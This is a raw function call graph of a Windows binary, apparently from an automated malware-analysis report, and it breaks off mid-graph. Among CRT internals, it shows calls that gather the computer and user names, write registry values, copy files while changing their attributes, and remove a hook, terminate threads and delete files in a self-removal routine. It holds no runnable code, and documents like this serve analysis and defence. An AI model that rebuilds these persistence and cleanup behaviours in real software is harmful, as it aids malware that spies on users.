CallCatchBlock 19730->19731 19738 1316856 EnterCriticalSection 19731->19738 19733 13190c2 19739 1319117 19733->19739 19737 13190db __wsopen_s 19737->19546 19738->19733 19751 1319837 19739->19751 19741 1319165 19742 1319837 26 API calls 19741->19742 19743 1319181 19742->19743 19744 1319837 26 API calls 19743->19744 19745 131919f 19744->19745 19746 13190cf 19745->19746 19747 1314615 _free 20 API calls 19745->19747 19748 13190e3 19746->19748 19747->19746 19765 131689e LeaveCriticalSection 19748->19765 19750 13190ed 19750->19737 19752 1319848 19751->19752 19761 1319844 19751->19761 19753 131984f 19752->19753 19756 1319862 ___scrt_fastfail 19752->19756 19754 1313cd1 __dosmaperr 20 API calls 19753->19754 19755 1319854 19754->19755 19757 13110b9 __cftof 26 API calls 19755->19757 19758 1319890 19756->19758 19759 1319899 19756->19759 19756->19761 19757->19761 19760 1313cd1 __dosmaperr 20 API calls 19758->19760 19759->19761 19763 1313cd1 __dosmaperr 20 API calls 19759->19763 19762 1319895 19760->19762 19761->19741 19764 13110b9 __cftof 26 API calls 19762->19764 19763->19762 19764->19761 19765->19750 19767 130e1a2 __fassign 38 API calls 19766->19767 19768 13198cc 19767->19768 19768->19085 19769->19090 20064 13074b8 FindResourceA LoadResource LockResource SizeofResource 19770->20064 19772 1307034 19773 130703a 19772->19773 19774 130704d 19772->19774 19775 1302917 28 API calls 19773->19775 19776 1311119 ___std_exception_copy 21 API calls 19774->19776 19777 1307046 19775->19777 19778 130705a 19776->19778 19777->19092 19779 1311119 ___std_exception_copy 21 API calls 19778->19779 19780 1307078 19779->19780 20065 130421f 19780->20065 19782 13070ab 19783 13028af 26 API calls 19782->19783 19783->19777 19785 1302977 19784->19785 20132 1302f40 19785->20132 19787 1302982 19787->19098 19808 13072e2 __EH_prolog 19788->19808 19789 1307375 19790 13028af 26 API calls 19789->19790 19791 13073a7 19790->19791 19793 13028af 26 API calls 19791->19793 19792 1307377 19794 1308169 28 API calls 19792->19794 19796 13073af 19793->19796 19798 1307383 19794->19798 19797 13028af 26 API calls 19796->19797 19799 130584c 19797->19799 19800 13028b4 26 API calls 19798->19800 19809 1305eed 19799->19809 19802 130738c 19800->19802 19803 13028af 26 API calls 19802->19803 19805 1307394 19803->19805 19804 13028af 26 API calls 19804->19808 19806 1307f56 28 API calls 19805->19806 19806->19789 19808->19789 19808->19792 19808->19804 20136 1308169 19808->20136 20139 13028b4 19808->20139 20143 1307f56 19808->20143 19810 1305efa 19809->19810 19812 1305f0a 19810->19812 20251 1305f3d 19810->20251 19812->19103 19814 1304c16 19813->19814 19815 1304c1e 19814->19815 20257 1304c4a 19814->20257 19815->19105 19819 13027e9 19818->19819 20260 1302ae0 19819->20260 20285 1323174 19822->20285 19824 1307c2b GetComputerNameExW GetUserNameW 19825 13027e1 28 API calls 19824->19825 19826 1307c73 19825->19826 19827 130326c 28 API calls 19826->19827 19828 1307c83 19827->19828 19829 13031ae 28 API calls 19828->19829 19830 1307c97 19829->19830 19831 1302755 26 API calls 19830->19831 19832 1307ca1 19831->19832 19833 1302755 26 API calls 19832->19833 19834 13058af 19833->19834 19835 130275a 19834->19835 19836 1302769 19835->19836 19838 1302774 19836->19838 20286 13029cd 19836->20286 19838->19115 19840 13029cd 19839->19840 19841 130316c 26 API calls 19840->19841 19842 13029f0 19840->19842 19841->19842 19842->19117 20290 13039e0 19843->20290 19845 1303280 19845->19123 20310 1303a25 19846->20310 19848 13031c2 19848->19125 19850 13075f0 19849->19850 20328 130826f 19850->20328 19852 13075f8 19852->19155 19854 13061e1 19853->19854 20346 130618e RegCreateKeyA 19854->20346 19857 13028af 26 API calls 19858 1305aaa 19857->19858 19859 13028af 19858->19859 19860 1302d50 19859->19860 19861 1302d73 19860->19861 19862 130304a 26 API calls 19860->19862 19861->19162 19862->19861 19864 1311aec _strftime 19863->19864 20349 1311172 19864->20349 19908 130291f 19907->19908 21065 1302dfa 19908->21065 19926 1304dcf _wcslen __EH_prolog 19925->19926 19927 1304e59 19926->19927 19928 1304def 19926->19928 19930 1307692 33 API calls 19927->19930 19929 1307692 33 API calls 19928->19929 19931 1304dfa 19929->19931 19932 1304e68 19930->19932 19933 130275a 26 API calls 19931->19933 19934 130275a 26 API calls 19932->19934 19935 1304e03 19933->19935 19936 1304e53 19934->19936 19937 1302755 26 API calls 19935->19937 19938 1302755 26 API calls 19936->19938 19939 1304e0b 19937->19939 19941 1304e7e 19938->19941 19940 1304e14 CreateDirectoryW 19939->19940 19942 13031d6 28 API calls 19940->19942 19945 1304e96 19941->19945 19946 1304eaa 19941->19946 19943 1304e2a 19942->19943 19944 13031ae 28 API calls 19943->19944 19947 1304e3d 19944->19947 22008 1305229 19945->22008 19950 1304eb1 PathFileExistsW 19946->19950 19949 130275a 26 API calls 19947->19949 19951 1304e4b 19949->19951 19952 1304ebc 19950->19952 19953 1304ecf 19950->19953 19954 1302755 26 API calls 19951->19954 19955 1304ec8 SetFileAttributesW 19952->19955 19956 1304ed8 CopyFileW 19953->19956 19954->19936 19955->19953 19957 1304f93 19956->19957 19960 1304eec _wcslen 19956->19960 19958 1305229 31 API calls 19957->19958 19959 1304fa1 19958->19959 19961 1304fd4 19959->19961 19965 1304fb1 SetFileAttributesW 19959->19965 19960->19957 19962 1304f53 19960->19962 19963 1304f06 19960->19963 19969 13027e1 28 API calls 19961->19969 19964 1307692 33 API calls 19962->19964 19966 1307692 33 API calls 19963->19966 19967 1304f59 19964->19967 19977 1304fc0 _wcslen 19965->19977 19968 1304f0c 19966->19968 19970 130275a 26 API calls 19967->19970 19971 13031ae 28 API calls 19968->19971 19972 1304fe8 19969->19972 19973 1304f4d 19970->19973 19974 1304f24 19971->19974 19975 13031ae 28 API calls 19972->19975 19976 1302755 26 API calls 19973->19976 19978 13031ae 28 API calls 19974->19978 19979 1305001 19975->19979 19980 1304f6a 19976->19980 19977->19961 19981 1304fd1 SetFileAttributesW 19977->19981 19982 1304f34 19978->19982 19983 1302755 26 API calls 19979->19983 19986 1304f73 CopyFileW 19980->19986 19981->19961 19984 130275a 26 API calls 19982->19984 19985 130500e 19983->19985 19987 1304f3d 19984->19987 19988 13027e1 28 API calls 19985->19988 19986->19957 19990 1304ea4 19986->19990 19991 1302755 26 API calls 19987->19991 19989 130501b 19988->19989 19992 1303a48 28 API calls 19989->19992 19990->19204 19993 1304f45 19991->19993 19994 130502c 19992->19994 19995 1302755 26 API calls 19993->19995 19996 13050f3 19994->19996 19997 13027e1 28 API calls 19994->19997 19995->19973 19998 13027e1 28 API calls 19996->19998 19999 1305046 19997->19999 20000 1305103 19998->20000 20002 13027e1 28 API calls 19999->20002 20001 13027e1 28 API calls 20000->20001 20003 1305119 20001->20003 20004 130505c 20002->20004 20005 13033aa 28 API calls 20003->20005 20006 13031ae 28 API calls 20004->20006 20007 130512b 20005->20007 20008 1305073 20006->20008 20009 130333b 28 API calls 20007->20009 20010 130333b 28 API calls 20008->20010 20011 130513e 20009->20011 20012 1305083 20010->20012 20013 13031ae 28 API calls 20011->20013 20014 13031ae 28 API calls 20012->20014 20016 1305093 20014->20016 20017 13031ae 28 API calls 20016->20017 20051 1305e90 20050->20051 22035 1311edc 20051->22035 20054 1305775 76 API calls 20055 1305eab 20054->20055 20056 1305775 76 API calls 20055->20056 20057 1305eb5 20056->20057 20058 1305775 76 API calls 20057->20058 20059 1305ebf 20058->20059 20060 1305775 76 API calls 20059->20060 20061 1305ec9 20060->20061 20062 1305775 76 API calls 20061->20062 20063 1305ecf 20062->20063 20063->19144 20064->19772 20068 1302937 20065->20068 20067 1304233 20067->19782 20069 130293f 20068->20069 20072 1302e1d 20069->20072 20071 1302955 20071->20067 20073 1302e29 20072->20073 20075 1302e33 20073->20075 20076 1303677 20073->20076 20075->20071 20077 1303681 20076->20077 20078 1303702 20077->20078 20081 1303689 20077->20081 20093 13038e3 20078->20093 20086 1303037 20081->20086 20083 13036ac 20085 13036dc 20083->20085 20090 130304a 20083->20090 20085->20075 20087 1303040 20086->20087 20096 13037c5 20087->20096 20089 1303047 20089->20083 20110 13037dc 20090->20110 20092 1303057 20092->20085 20121 130968d 20093->20121 20097 13011fb 20096->20097 20098 1303d9f 20096->20098 20099 13037d9 20097->20099 20102 1309967 22 API calls 20097->20102 20100 13011fb 22 API calls 20098->20100 20099->20089 20101 1303db1 20100->20101 20103 1303dc1 20101->20103 20104 1303db7 20101->20104 20105 1301201 20102->20105 20106 131103e __cftof 26 API calls 20103->20106 20104->20089 20105->20089 20107 13110d8 20106->20107 20108 13110e6 __cftof 11 API calls 20107->20108 20109 13110e5 20108->20109 20111 13037ef 20110->20111 20113 13037fa 20110->20113 20114 1301203 20111->20114 20113->20092 20115 1301215 20114->20115 20116 1301218 20114->20116 20115->20113 20117 131103e __cftof 26 API calls 20116->20117 20118 13110d8 20117->20118 20119 13110e6 __cftof 11 API calls 20118->20119 20120 13110e5 20119->20120 20126 13095db 20121->20126 20124 130c79f __CxxThrowException@8 RaiseException 20125 13096ac 20124->20125 20129 130958b 20126->20129 20130 130c71d ___std_exception_copy 27 API calls 20129->20130 20131 13095b7 20130->20131 20131->20124 20134 1302f4a 20132->20134 20133 1302f66 20133->19787 20134->20133 20135 1303037 28 API calls 20134->20135 20135->20133 20150 1308651 20136->20150 20140 13028c3 20139->20140 20142 13028ce 20140->20142 20176 1302d50 20140->20176 20142->19808 20144 1307f5b 20143->20144 20145 1307f78 20144->20145 20146 1307f7f 20144->20146 20180 1307f90 20145->20180 20184 1308993 20146->20184 20148 1307f7d 20148->19808 20151 130865a 20150->20151 20154 13086ea 20151->20154 20155 13086f9 20154->20155 20160 1303d71 20155->20160 20157 1308705 20158 1302e1d 28 API calls 20157->20158 20159 130817c 20158->20159 20159->19808 20161 1303d7a 20160->20161 20162 1303d7d 20160->20162 20161->20157 20165 1303d83 20162->20165 20168 13096ad 20165->20168 20173 1309630 20168->20173 20171 130c79f __CxxThrowException@8 RaiseException 20172 1303d8d 20171->20172 20174 130958b std::exception::exception 27 API calls 20173->20174 20175 1309642 20174->20175 20175->20171 20177 1302d5a 20176->20177 20178 1302d73 20177->20178 20179 130304a 26 API calls 20177->20179 20178->20142 20179->20178 20181 1307f96 20180->20181 20203 130897c 20181->20203 20185 130899d __EH_prolog 20184->20185 20186 13089d6 20185->20186 20187 1308a9c 20185->20187 20207 1308fd9 20186->20207 20224 1308eef 20187->20224 20191 13089ea 20192 130897c 28 API calls 20191->20192 20193 1308a1a 20192->20193 20194 1308a39 20193->20194 20195 1308a2d 20193->20195 20214 1309061 20194->20214 20211 1309044 20195->20211 20198 1308a37 20218 1308fec 20198->20218 20200 1309061 26 API calls 20200->20198 20202 1308a67 20202->20148 20204 1308985 20203->20204 20205 130296e 28 API calls 20204->20205 20206 1307fb0 20205->20206 20206->20148 20208 1308fe2 20207->20208 20209 13037c5 28 API calls 20208->20209 20210 1308fe9 20209->20210 20210->20191 20227 1309138 20211->20227 20215 1309066 20214->20215 20216 130925c 26 API calls 20215->20216 20217 1308a45 20216->20217 20217->20200 20220 1308ff6 20218->20220 20219 130901a 20219->20202 20220->20219 20245 1305fab 20220->20245 20222 130900b 20248 130602b 20222->20248 20225 130968d std::_Xinvalid_argument 28 API calls 20224->20225 20226 1308ef9 20225->20226 20228 130913d 20227->20228 20231 130925c 20228->20231 20230 130905d 20230->20198 20232 1309264 20231->20232 20235 1309429 20232->20235 20234 1309299 20234->20230 20236 1309443 20235->20236 20239 1309485 20236->20239 20242 130604d 20239->20242 20243 130609a 26 API calls 20242->20243 20244 130605e 20243->20244 20244->20234 20246 130604d 26 API calls 20245->20246 20247 1305fb9 20246->20247 20247->20222 20249 13037dc 26 API calls 20248->20249 20250 1306039 20249->20250 20250->20219 20252 1305f46 20251->20252 20253 1305f6d 20252->20253 20254 1305fab 26 API calls 20252->20254 20253->19812 20255 1305f5e 20254->20255 20256 130602b 26 API calls 20255->20256 20256->20253 20258 13096ad 28 API calls 20257->20258 20259 1304c54 20258->20259 20261 1302aec 20260->20261 20264 1302b03 20261->20264 20263 13027fb 20263->19107 20265 1302b0f 20264->20265 20267 1302b19 20265->20267 20268 1303519 20265->20268 20267->20263 20269 1303523 20268->20269 20270 13035a4 20269->20270 20273 130352b 20269->20273 20271 13038e3 28 API calls 20270->20271 20272 13035a9 20271->20272 20278 1303159 20273->20278 20275 130354e 20277 130357e 20275->20277 20282 130316c 20275->20282 20277->20267 20279 1303162 20278->20279 20280 13037c5 28 API calls 20279->20280 20281 1303169 20280->20281 20281->20275 20283 13037dc 26 API calls 20282->20283 20284 130317c 20283->20284 20284->20277 20285->19824 20287 13029d7 20286->20287 20288 130316c 26 API calls 20287->20288 20289 13029f0 20287->20289 20288->20289 20289->19838 20291 13039ec 20290->20291 20294 1303b98 20291->20294 20293 1303a00 20293->19845 20295 1303ba8 20294->20295 20296 1303d71 28 API calls 20295->20296 20297 1303bb4 20296->20297 20299 1303bc4 20297->20299 20300 1303f4e 20297->20300 20299->20293 20301 1303f5e 20300->20301 20302 1304006 20301->20302 20303 1303f76 20301->20303 20304 13038e3 28 API calls 20302->20304 20306 1303159 28 API calls 20303->20306 20305 130400b 20304->20305 20307 1303f94 20306->20307 20308 130316c 26 API calls 20307->20308 20309 1303fd6 20307->20309 20308->20309 20309->20299 20311 1303a31 20310->20311 20314 13030a4 20311->20314 20313 1303a44 20313->19848 20315 13030ae 20314->20315 20317 13030c2 20315->20317 20318 130380b 20315->20318 20317->20313 20319 130381b 20318->20319 20320 13038c2 20319->20320 20321 1303833 20319->20321 20322 13038e3 28 API calls 20320->20322 20324 1303159 28 API calls 20321->20324 20323 13038c7 20322->20323 20325 1303851 20324->20325 20326 130316c 26 API calls 20325->20326 20327 1303892 20325->20327 20326->20327 20327->20317 20329 1308277 20328->20329 20332 1308532 20329->20332 20331 130828a 20331->19852 20333 130853e 20332->20333 20335 1308548 20333->20335 20336 1308d3e 20333->20336 20335->20331 20337 1308d48 20336->20337 20338 1308dc6 20337->20338 20341 1308d50 20337->20341 20339 13038e3 28 API calls 20338->20339 20340 1308dcb 20339->20340 20342 1303037 28 API calls 20341->20342 20343 1308d73 20342->20343 20344 130304a 26 API calls 20343->20344 20345 1308da0 20343->20345 20344->20345 20345->20335 20347 13061ce 20346->20347 20348 13061a6 RegSetValueExA RegCloseKey 20346->20348 20347->19857 20348->20347 20367 1310827 20349->20367 20351 13111bf 20353 1311184 20353->20351 20354 1311199 20353->20354 20366 1305b8d 20353->20366 20368 131082c 20367->20368 20369 131083f 20367->20369 20370 1313cd1 __dosmaperr 20 API calls 20368->20370 20369->20353 20371 1310831 20370->20371 21066 1302e06 21065->21066 21067 1302e1d 28 API calls 21066->21067 21068 1302931 21067->21068 21068->19253 22009 1305233 __EH_prolog 22008->22009 22010 130528b 22009->22010 22012 1303294 28 API calls 22009->22012 22011 13052ce 22010->22011 22013 1303294 28 API calls 22010->22013 22011->19990 22014 1305258 22012->22014 22015 13052a0 22013->22015 22016 13031ae 28 API calls 22014->22016 22017 13031ae 28 API calls 22015->22017 22018 1305269 22016->22018 22019 13052b0 22017->22019 22026 1306201 22018->22026 22022 1306201 29 API calls 22019->22022 22024 13052c3 22022->22024 22023 1302755 26 API calls 22023->22010 22025 1302755 26 API calls 22024->22025 22025->22011 22027 1306213 22026->22027 22032 130614b RegCreateKeyW 22027->22032 22030 1302755 26 API calls 22031 130527c 22030->22031 22031->22023 22033 1306186 22032->22033 22034 130615f RegSetValueExW RegCloseKey 22032->22034 22033->22030 22034->22033 22038 1311dca 22035->22038 22037 1305ea0 22037->20054 22039 1311dd6 CallCatchBlock 22038->22039 22040 1311de4 22039->22040 22042 1311e05 22039->22042 22043 1311e16 22039->22043 22041 1313cd1 __dosmaperr 20 API calls 22040->22041 22044 1311de9 22041->22044 22045 1313cd1 __dosmaperr 20 API calls 22042->22045 22043->22040 22047 1311e2e 22043->22047 22046 13110b9 __cftof 26 API calls 22044->22046 22052 1311df3 __wsopen_s 22045->22052 22046->22052 22048 1311e32 22047->22048 22049 1311e3e 22047->22049 22051 1313cd1 __dosmaperr 20 API calls 22048->22051 22059 130e474 EnterCriticalSection 22049->22059 22051->22052 22052->22037 22053 1311e49 22055 1311e62 22053->22055 22060 13168b5 22053->22060 22056 1311eb8 22055->22056 22057 1313cd1 __dosmaperr 20 API calls 22055->22057 22076 1311ed2 22056->22076 22057->22056 22059->22053 22061 13168c2 22060->22061 22062 13168d7 22060->22062 22063 1313cd1 __dosmaperr 20 API calls 22061->22063 22069 13168d2 22062->22069 22079 1314dae 22062->22079 22064 13168c7 22063->22064 22067 13110b9 __cftof 26 API calls 22064->22067 22067->22069 22069->22055 22072 13168f9 22096 131e3a1 22072->22096 22075 1314615 _free 20 API calls 22075->22069 22314 130e488 LeaveCriticalSection 22076->22314 22078 1311eda 22078->22052 22080 1314dc6 22079->22080 22081 1314dc2 22079->22081 22080->22081 22082 1316310 26 API calls 22080->22082 22085 1314f3c 22081->22085 22083 1314de6 22082->22083 22111 131be17 22083->22111 22086 1314f52 22085->22086 22087 1314f63 22085->22087 22086->22087 22088 1314615 _free 20 API calls 22086->22088 22089 1316310 22087->22089 22088->22087 22090 1316331 22089->22090 22091 131631c 22089->22091 22090->22072 22092 1313cd1 __dosmaperr 20 API calls 22091->22092 22093 1316321 22092->22093 22094 13110b9 __cftof 26 API calls 22093->22094 22095 131632c 22094->22095 22095->22072 22097 131e3b0 22096->22097 22098 131e3c5 22096->22098 22099 1313cbe __dosmaperr 20 API calls 22097->22099 22100 131e400 22098->22100 22105 131e3ec 22098->22105 22102 131e3b5 22099->22102 22101 1313cbe __dosmaperr 20 API calls 22100->22101 22103 131e405 22101->22103 22104 1313cd1 __dosmaperr 20 API calls 22102->22104 22106 1313cd1 __dosmaperr 20 API calls 22103->22106 22108 13168ff 22104->22108 22258 131e379 22105->22258 22109 131e40d 22106->22109 22108->22069 22108->22075 22110 13110b9 __cftof 26 API calls 22109->22110 22110->22108 22112 131be23 CallCatchBlock 22111->22112 22113 131be43 22112->22113 22114 131be2b 22112->22114 22116 131bee1 22113->22116 22121 131be78 22113->22121 22115 1313cbe __dosmaperr 20 API calls 22114->22115 22117 131be30 22115->22117 22118 1313cbe __dosmaperr 20 API calls 22116->22118 22119 1313cd1 __dosmaperr 20 API calls 22117->22119 22120 131bee6 22118->22120 22122 131be38 __wsopen_s 22119->22122 22123 1313cd1 __dosmaperr 20 API calls 22120->22123 22136 131a6ed EnterCriticalSection 22121->22136 22122->22081 22125 131beee 22123->22125 22127 13110b9 __cftof 26 API calls 22125->22127 22126 131be7e 22128 131be9a 22126->22128 22129 131beaf 22126->22129 22127->22122 22131 1313cd1 __dosmaperr 20 API calls 22128->22131 22137 131bf02 22129->22137 22133 131be9f 22131->22133 22132 131beaa 22188 131bed9 22132->22188 22134 1313cbe __dosmaperr 20 API calls 22133->22134 22134->22132 22136->22126 22138 131bf30 22137->22138 22176 131bf29 22137->22176 22139 131bf53 22138->22139 22140 131bf34 22138->22140 22143 131bfa4 22139->22143 22144 131bf87 22139->22144 22142 1313cbe __dosmaperr 20 API calls 22140->22142 22141 130a07b _ValidateLocalCookies 5 API calls 22145 131c10a 22141->22145 22146 131bf39 22142->22146 22148 131bfba 22143->22148 22191 131fbcf 22143->22191 22147 1313cbe __dosmaperr 20 API calls 22144->22147 22145->22132 22149 1313cd1 __dosmaperr 20 API calls 22146->22149 22153 131bf8c 22147->22153 22194 131baa7 22148->22194 22151 131bf40 22149->22151 22154 13110b9 __cftof 26 API calls 22151->22154 22156 1313cd1 __dosmaperr 20 API calls 22153->22156 22154->22176 22159 131bf94 22156->22159 22157 131c001 22163 131c015 22157->22163 22164 131c05b WriteFile 22157->22164 22158 131bfc8 22160 131bfcc 22158->22160 22161 131bfee 22158->22161 22162 13110b9 __cftof 26 API calls 22159->22162 22167 131c0c2 22160->22167 22201 131ba3a 22160->22201 22206 131b887 GetConsoleCP 22161->22206 22162->22176 22165 131c04b 22163->22165 22166 131c01d 22163->22166 22169 131c07e GetLastError 22164->22169 22174 131bfe4 22164->22174 22232 131bb1d 22165->22232 22170 131c022 22166->22170 22171 131c03b 22166->22171 22167->22176 22177 1313cd1 __dosmaperr 20 API calls 22167->22177 22169->22174 22170->22167 22217 131bbfc 22170->22217 22224 131bcea 22171->22224 22174->22167 22174->22176 22178 131c09e 22174->22178 22176->22141 22180 131c0e7 22177->22180 22182 131c0a5 22178->22182 22183 131c0b9 22178->22183 22181 1313cbe __dosmaperr 20 API calls 22180->22181 22181->22176 22184 1313cd1 __dosmaperr 20 API calls 22182->22184 22185 1313c9b __dosmaperr 20 API calls 22183->22185 22186 131c0aa 22184->22186 22185->22176 22187 1313cbe __dosmaperr 20 API calls 22186->22187 22187->22176 22257 131a7a4 LeaveCriticalSection 22188->22257 22190 131bedf 22190->22122 22239 131fb36 22191->22239 22248 131de26 22194->22248 22196 131bab7 22197 131babc 22196->22197 22198 131440f pre_c_initialization 38 API calls 22196->22198 22197->22157 22197->22158 22199 131badf 22198->22199 22199->22197 22200 131bafd GetConsoleMode 22199->22200 22200->22197 22204 131ba94 22201->22204 22205 131ba5f 22201->22205 22202 131ba96 GetLastError 22202->22204 22203 131fbea WriteConsoleW CreateFileW __wsopen_s 22203->22205 22204->22174 22205->22202 22205->22203 22205->22204 22211 131b8ea 22206->22211 22216 131b9fc 22206->22216 22207 130a07b _ValidateLocalCookies 5 API calls 22208 131ba36 22207->22208 22208->22174 22209 1313ce4 __wsopen_s 38 API calls 22209->22211 22210 131536d 40 API calls __fassign 22210->22211 22211->22209 22211->22210 22212 131b970 WideCharToMultiByte 22211->22212 22215 131b9c7 WriteFile 22211->22215 22211->22216 22213 131b996 WriteFile 22212->22213 22212->22216 22213->22211 22214 131ba1f GetLastError 22213->22214 22214->22216 22215->22211 22215->22214 22216->22207 22218 131bc0b __wsopen_s 22217->22218 22219 131bccd 22218->22219 22220 131bc89 WriteFile 22218->22220 22221 130a07b _ValidateLocalCookies 5 API calls 22219->22221 22220->22218 22222 131bccf GetLastError 22220->22222 22223 131bce6 22221->22223 22222->22219 22223->22174 22227 131bcf9 __wsopen_s 22224->22227 22225 131be04 22226 130a07b _ValidateLocalCookies 5 API calls 22225->22226 22228 131be13 22226->22228 22227->22225 22229 131bd7b WideCharToMultiByte 22227->22229 22230 131bdb0 WriteFile 22227->22230 22228->22174 22229->22230 22231 131bdfc GetLastError 22229->22231 22230->22227 22230->22231 22231->22225 22235 131bb2c __wsopen_s 22232->22235 22233 131bbdf 22234 130a07b _ValidateLocalCookies 5 API calls 22233->22234 22237 131bbf8 22234->22237 22235->22233 22236 131bb9e WriteFile 22235->22236 22236->22235 22238 131bbe1 GetLastError 22236->22238 22237->22174 22238->22233 22240 131a96a __wsopen_s 26 API calls 22239->22240 22241 131fb48 22240->22241 22242 131fb61 SetFilePointerEx 22241->22242 22243 131fb50 22241->22243 22244 131fb79 GetLastError 22242->22244 22245 131fb55 22242->22245 22246 1313cd1 __dosmaperr 20 API calls 22243->22246 22247 1313c9b __dosmaperr 20 API calls 22244->22247 22245->22148 22246->22245 22247->22245 22249 131de40 22248->22249 22250 131de33 22248->22250 22252 131de4c 22249->22252 22253 1313cd1 __dosmaperr 20 API calls 22249->22253 22251 1313cd1 __dosmaperr 20 API calls 22250->22251 22254 131de38 22251->22254 22252->22196 22255 131de6d 22253->22255 22254->22196 22256 13110b9 __cftof 26 API calls 22255->22256 22256->22254 22257->22190 22261 131e2f7 22258->22261 22260 131e39d 22260->22108 22262 131e303 CallCatchBlock 22261->22262 22272 131a6ed EnterCriticalSection 22262->22272 22264 131e311 22265 131e343 22264->22265 22266 131e338 22264->22266 22267 1313cd1 __dosmaperr 20 API calls 22265->22267 22273 131e420 22266->22273 22269 131e33e 22267->22269 22288 131e36d 22269->22288 22271 131e360 __wsopen_s 22271->22260 22272->22264 22291 131a96a 22273->22291 22275 131e436 22304 131a8d9 22275->22304 22277 131e430 22277->22275 22278 131e468 22277->22278 22280 131a96a __wsopen_s 26 API calls 22277->22280 22278->22275 22281 131a96a __wsopen_s 26 API calls 22278->22281 22283 131e45f 22280->22283 22284 131e474 CloseHandle 22281->22284 22282 131e4b0 22282->22269 22286 131a96a __wsopen_s 26 API calls 22283->22286 22284->22275 22287 131e480 GetLastError 22284->22287 22285 1313c9b __dosmaperr 20 API calls 22285->22282 22286->22278 22287->22275 22313 131a7a4 LeaveCriticalSection 22288->22313 22290 131e377 22290->22271 22292 131a977 22291->22292 22293 131a98c 22291->22293 22294 1313cbe __dosmaperr 20 API calls 22292->22294 22296 1313cbe __dosmaperr 20 API calls 22293->22296 22298 131a9b1 22293->22298 22295 131a97c 22294->22295 22297 1313cd1 __dosmaperr 20 API calls 22295->22297 22299 131a9bc 22296->22299 22301 131a984 22297->22301 22298->22277 22300 1313cd1 __dosmaperr 20 API calls 22299->22300 22302 131a9c4 22300->22302 22301->22277 22303 13110b9 __cftof 26 API calls 22302->22303 22303->22301 22305 131a8e8 22304->22305 22306 131a94f 22304->22306 22305->22306 22311 131a912 __wsopen_s 22305->22311 22307 1313cd1 __dosmaperr 20 API calls 22306->22307 22308 131a954 22307->22308 22309 1313cbe __dosmaperr 20 API calls 22308->22309 22310 131a93f 22309->22310 22310->22282 22310->22285 22311->22310 22312 131a939 SetStdHandle 22311->22312 22312->22310 22313->22290 22314->22078 22350 13052e7 __EH_prolog 22346->22350 22348 1302814 28 API calls 22348->22350 22349 13053a9 22351 1302814 28 API calls 22349->22351 22350->22348 22350->22349 22352 1305323 22350->22352 22353 1305399 Sleep 22350->22353 22357 1302917 28 API calls 22350->22357 22360 130757a 28 API calls 22350->22360 22364 1306201 29 API calls 22350->22364 22366 13028af 26 API calls 22350->22366 22640 13060ed RegOpenKeyExW 22350->22640 22355 13053b9 22351->22355 22643 130541e 22352->22643 22353->22350 22356 1306201 29 API calls 22355->22356 22358 13053d1 22356->22358 22357->22350 22359 1302917 28 API calls 22358->22359 22361 13053e1 22359->22361 22360->22350 22362 130757a 28 API calls 22361->22362 22363 13053f2 22362->22363 22365 1306201 29 API calls 22363->22365 22364->22350 22367 130540a 22365->22367 22366->22353 22368 13028af 26 API calls 22367->22368 22369 1305415 ExitProcess 22368->22369 22641 1306143 22640->22641 22642 1306117 RegQueryValueExW RegCloseKey 22640->22642 22641->22350 22642->22641 22644 1305428 __EH_prolog 22643->22644 22725 130269f TerminateThread 22644->22725 22646 1305450 22648 130545a RegDeleteKeyW 22646->22648 22647 1305436 22647->22646 22649 13070d8 9 API calls 22647->22649 22650 1305475 22648->22650 22652 1305484 22648->22652 22649->22646 22732 130623e RegOpenKeyExW 22650->22732 22651 13054a0 ___scrt_fastfail 22653 13054b6 GetModuleFileNameW 22651->22653 22652->22651 22655 130623e 2 API calls 22652->22655 22657 13054d4 22653->22657 22655->22651 22656 13054ed SetFileAttributesW 22658 1306f77 42 API calls 22656->22658 22657->22656 22659 13054ea SetFileAttributesW 22657->22659 22660 130550c 22658->22660 22659->22656 22726 1302667 22725->22726 22727 13026bd UnhookWindowsHookEx TerminateThread 22725->22727 22728 1302673 DeleteFileW 22726->22728 22727->22726 22730 1302688 22728->22730 22729 130269a 22729->22647 22730->22729 22731 1302693 RemoveDirectoryW 22730->22731 22731->22729 22733 130625a RegDeleteValueW 22732->22733 22734 130626a 22732->22734 22733->22734 22734->22652 22736 13126a5 IsInExceptionSpec 22735->22736 22737 13126bd 22736->22737 22757 13127f3 GetModuleHandleW 22736->22757 22766 1316856 EnterCriticalSection 22737->22766 22741 1312763 22770 13127a3 22741->22770 22744 13126c5 22744->22741 22746 131273a 22744->22746 22767 131344d 22744->22767 22749 1312752 22746->22749 22750 13136d3 _abort 5 API calls 22746->22750 22747 1312780 22773 13127b2 22747->22773 22748 13127ac 22754 1322cc9 _abort 5 API calls 22748->22754 22751 13136d3 _abort 5 API calls 22749->22751 22750->22749 22751->22741 22755 13127b1 22754->22755 22755->19056 22758 13126b1 22757->22758 22758->22737 22759 1312837 GetModuleHandleExW 22758->22759 22760 1312861 GetProcAddress 22759->22760 22764 1312876 22759->22764 22760->22764 22761 1312893 22763 130a07b _ValidateLocalCookies 5 API calls 22761->22763 22762 131288a FreeLibrary 22762->22761 22765 131289d 22763->22765 22764->22761 22764->22762 22765->22737 22766->22744 22781 1313186 22767->22781 22803 131689e LeaveCriticalSection 22770->22803 22772 131277c 22772->22747 22772->22748 22804 1314c51 22773->22804 22776 13127e0 22778 1312837 _abort 8 API calls 22776->22778 22777 13127c0 GetPEB 22777->22776 22779 13127d0 GetCurrentProcess TerminateProcess 22777->22779 22780 13127e8 ExitProcess 22778->22780 22779->22776 22784 1313135 22781->22784 22783 13131aa 22783->22746 22785 1313141 CallCatchBlock 22784->22785 22792 1316856 EnterCriticalSection 22785->22792 22787 131314f 22793 13131d6 22787->22793 22791 131316d __wsopen_s 22791->22783 22792->22787 22794 13131f6 22793->22794 22795 13131fe 22793->22795 22796 130a07b _ValidateLocalCookies 5 API calls 22794->22796 22795->22794 22798 1314615 _free 20 API calls 22795->22798 22797 131315c 22796->22797 22799 131317a 22797->22799 22798->22794 22802 131689e LeaveCriticalSection 22799->22802 22801 1313184 22801->22791 22802->22801 22803->22772 22805 1314c76 22804->22805 22809 1314c6c 22804->22809 22806 1314669 __dosmaperr 5 API calls 22805->22806 22806->22809 22807 130a07b _ValidateLocalCookies 5 API calls 22808 13127bc 22807->22808 22808->22776 22808->22777 22809->22807 22813 131a20a 22810->22813 22815 131a223 22813->22815 22814 130a07b _ValidateLocalCookies 5 API calls 22816 1309bb6 22814->22816 22815->22814 22816->19304 23381 1311c77 23382 1311c83 CallCatchBlock 23381->23382 23389 1316856 EnterCriticalSection 23382->23389 23384 1311c8e 23390 1311ccc 23384->23390 23388 